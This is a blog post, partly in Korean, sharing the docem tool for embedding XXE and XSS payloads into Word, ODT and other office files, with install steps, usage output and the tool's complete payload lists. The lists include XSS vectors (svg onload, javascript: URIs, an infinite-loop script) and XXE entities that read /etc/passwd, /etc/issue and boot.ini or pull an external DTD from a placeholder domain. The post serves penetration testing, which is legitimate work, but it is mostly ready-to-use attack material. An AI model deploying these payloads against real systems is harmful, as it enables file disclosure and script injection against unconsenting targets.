XXE 테스트 시 쓸만한 도구 하나 찾아서 공유드립니다.
직접 노가다하거나 기존에 공개됬던 툴보단 훨씬 편리할 것 같습니다.

When I tested OXML XXE, OOXML XXE, I used to create payload myself or used this tool.


Recently, i found powerful tool, I’d like to share a this tool, docem.

If you would like to know how to insert payload you self, please refer to the this link.
There’s a similar tool on burp extension.
https://www.hahwul.com/2017/12/web-hacking-ooxml-xxe-with-burp.html

Powerful!!!  /  https://i.giphy.com/8P1ugJO2Tw9Usg0JJK.gif

How to install?

Just simple.

oneline command
git clone https://github.com/whitel1st/docem;cd docem;pip3 install -r requirements.txt;alias add docem="python3 $(pwd)/docem.py"

1) clone docem repo
$ git clone https://github.com/whitel1st/docem
$ cd docem

2) Install required packages
$ pip3 install -r requirements.txt

3) Run docem
$ python3 docem.py

usage: docem.py [-h] [-s SAMPLE] [-pm {xss,xxe}] [-kt]
                [-pt {per_place,per_file,per_document}] [-sx SAMPLE_EXTENSION]
                [-pf PAYLOAD_FILE]

Create docx,odt,pptx,etc files with XXE/XSS payloads

required arguments:
  -s SAMPLE             path to sample file
  -pm {xss,xxe}         payload mode: embedding XXE or XSS in a file

optional arguments:
  -h, --help            show this help message and exit
  -kt                   do not delete unpacked and modified folders
  -pt {per_place,per_file,per_document}
                        how many payloads will be in one file. per_document is
                        default
  -sx SAMPLE_EXTENSION  d
  -pf PAYLOAD_FILE      path to a file with payloads to embed

tip) Alias command
$ alias add docem="python3 $(pwd)/docem.py"

Inject XXE Payload to Office(word,excel etc…) file

It’s easy to create payloads through the docem.

query
$ docem -s samples/xxe/sample_oxml_xxe.docx -pm xxe -pf payloads/xxe_special_2.txt -kt -pt per_document -sx docx

output
Current magic_symbol:  XXCb8bBA9XX

=========== Current setup ===========
sample file:         samples/xxe/sample_oxml_xxe.docx
sample is it dir:     False
payload mode:         xxe
payload file:         payloads/xxe_special_2.txt
payload type:         per_document
number of payloads:     3
keep upacked files:     True

======== Count magic symbols ========
    0    symbols in docProps_app
    0    symbols in docProps_core
    0    symbols in _rels_
    ....snip....

payload_0
    packed to: tmp/sample_oxml_xxe-per_document-payload_0_1569687338738463.docx

payload_1
    packed to: tmp/sample_oxml_xxe-per_document-payload_1_1569687338751476.docx

payload_2
    packed to: tmp/sample_oxml_xxe-per_document-payload_2_156968733876288.docx

Extract Payload file…
unzip sample_oxml_xxe-per_document-payload_2_156968733876288.docx
Archive:  sample_oxml_xxe-per_document-payload_2_156968733876288.docx
   creating: _rels/
   creating: docProps/
   creating: word/
  inflating: [Content_Types].xml
  inflating: docProps/app.xml
  inflating: docProps/core.xml
  inflating: _rels/.rels
   creating: word/_rels/
   creating: word/theme/
  inflating: word/fontTable.xml
  inflating: word/document.xml
  inflating: word/settings.xml
  inflating: word/webSettings.xml
  inflating: word/styles.xml
  inflating: word/stylesWithEffects.xml
  inflating: word/theme/theme1.xml
  inflating: word/_rels/document.xml.rels

You find Injected Payload
$ cat document.xml
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE roottag PUBLIC "-//OXML/XXE/EN" "http://127.0.0.1/a.dtd//etc/passwd">

All Payloads..

Empty

1) payload/no_payload.txt
no_payload%

XXS

2) payload/xss_all.txt
xss_test
&apos;&quot;&gt;&lt;svg onload=alert(1)&gt;
&apos;&quot;&gt;&lt;svg onload=alert(2)>
&apos;&quot;>&lt;svg onload=alert(3)&gt;
&apos;&quot;>&lt;svg onload=alert(4)>
<!--'"><-->svg onload=alert(5)<!-->-->
<!--'"><-->svg onload=alert(6)>
<!--'"><svg onload=alert(7)>-->
<![CDATA["'><]]>svg onload=alert(8)>
<![CDATA["'><]]>svg onload=alert(9)<![CDATA[>]]>
&#39;&#34;&#62;&#60;svg onload=alert(10)&#62;
&#39;&#34;>&#60;svg onload=alert(11)&#62;
&#39;&#34;&#62;&#60;svg onload=alert(12)>
&#39;&#34;>&#60;svg onload=alert(13)>
&#x0027;&#x0022;&#x003E;&#x003C;svg onload=alert(14)&#x003E;
&#x0027;&#x0022;&#x003E;&#x003C;svg onload=alert(15)>
&#x0027;&#x0022;>&#x003C;svg onload=alert(16)&#x003E;
&#x0027;&#x0022;>&#x003C;svg onload=alert(17)>
%27%22%3E%3Csvg onload=alert(18)%3E
%27%22>%3Csvg%20onload%3Dalert(19)>
%27%22>%3Csvg onload=alert(20)>
%27%22%3E%3Csvg%20onload%3Dalert(21)%3E
%27%22%3E%3Csvg%20onload%3Dalert(22)>
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(23);<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
<![CDATA[<IMG SRC=x on]]><![CDATA[load=alert(24);">]]>
javascript:alert(25)
java%0ascript:alert(26)
java%09script:alert(27)
java%0dscript:alert(28)
java%0a%0dscript:alert(29)
java%0d%0ascript:alert(30)
\j\av\a\s\cr\i\pt\:\a\l\ert\(31\)
javascript://%0Aalert(32)
javascript://anything%0D%0A%0D%0Awindow.alert(33)
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#51;&#52;&#41;&#59;
&#x006A;&#x0061;&#x0076;&#x0061;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003A;alert(35)&#x003B;
%26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341

3) payload/xss_tiny.txt
&apos;&quot;&gt;&lt;svg onload=alert(1)&gt;
&#x0027;&#x0022;&#x003E;&#x003C;svg onload=alert(14)&#x003E;
%27%22%3E%3Csvg%20onload%3Dalert(21)%3E

XXE

4) payload/xxe_special_1.txt
{"vector":"<!DOCTYPE docem [<!ENTITY xxe_canary \"XXE_STRING\">]>","reference":"&xxe_canary;"}

5) payload/xxe_special_2.txt
{"vector":"<!DOCTYPE docem [<!ENTITY xxe_test \"XXE_STRING\">]>","reference":""}
{"vector":"<!DOCTYPE docem [<!ENTITY xxe_canary_0 \"XXE_STRING\">]>","reference":"&xxe_canary_0;"}
{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_2 SYSTEM \"file:///etc/lsb-release\">]>","reference":"&xxe_canary_2;"}

6) payload/xxe_special_3.txt
{"vector":"<!DOCTYPE docem [<!ENTITY xxe_test \"XXE_STRING\">]>","reference":""}
{"vector":"<!DOCTYPE docem [<!ENTITY xxe_canary_0 \"XXE_STRING\">]>","reference":"&xxe_canary_0;"}
{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_2 SYSTEM \"file:///etc/lsb-release\">]>","reference":"&xxe_canary_2;"}
{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_3 SYSTEM \"file:///etc/passwd\">]>","reference":"&xxe_canary_3;"}
{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_4 SYSTEM \"file:///c:/boot.ini\">]>","reference":"&xxe_canary_4;"}

7) payload/xxe_special_4.txt
{"vector":"<!DOCTYPE docem [<!ENTITY xxe_test \"XXE_STRING\">]>","reference":""}
{"vector":"<!DOCTYPE docem [<!ENTITY xxe_canary_0 \"XXE_STRING\">]>","reference":"&xxe_canary_0;"}
{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_2 SYSTEM \"file:///etc/lsb-release\">]>","reference":"&xxe_canary_2;"}
{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_3 SYSTEM \"file:///etc/passwd\">]>","reference":"&xxe_canary_3;"}
{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_4 SYSTEM \"file:///c:/boot.ini\">]>","reference":"&xxe_canary_4;"}
{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_5 SYSTEM \"file:///etc/issue\">]>","reference":"&xxe_canary_5;"}
{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY % xxe_canary_6 SYSTEM \"file:///etc/issue\"><!ENTITY % dtd SYSTEM \"custom_domain\">%dtd;%trick;]>  ]>","reference":""}

8) payload/xxe_special_5.txt
{"vector":"<!DOCTYPE docem [<!ENTITY xxe_test \"XXE_STRING\">]>","reference":""}
{"vector":"<!DOCTYPE docem [<!ENTITY xxe_canary_0 \"XXE_STRING\">]>","reference":"&xxe_canary_0;"}
{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_2 SYSTEM \"file:///etc/lsb-release\">]>","reference":"&xxe_canary_2;"}
{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_3 SYSTEM \"file:///etc/passwd\">]>","reference":"&xxe_canary_3;"}
{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_4 SYSTEM \"file:///c:/boot.ini\">]>","reference":"&xxe_canary_4;"}
{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_4 SYSTEM \"custom_domain_here\">]>","reference":"&xxe_canary_4;"}

댓글 없음:

댓글 쓰기